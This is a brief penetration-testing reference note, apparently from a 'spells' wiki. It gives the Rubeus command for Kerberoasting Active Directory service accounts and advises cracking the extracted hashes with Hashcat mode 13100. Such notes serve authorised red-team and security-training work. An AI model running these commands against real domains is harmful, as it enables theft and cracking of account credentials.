permalink: spells/kerberoasting-with-rubeus
tags:
- OS/Windows/ActiveDirectory
- Protocol/Kerberos
- AttackCycle/Exploitation/Kerberoasting
- Application/Rubeus
- Application/Hashcat# Extract password hashes for all known kerberoastable accounts using
# Rubeus.
#
Rubeus.exe kerberoast
The password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).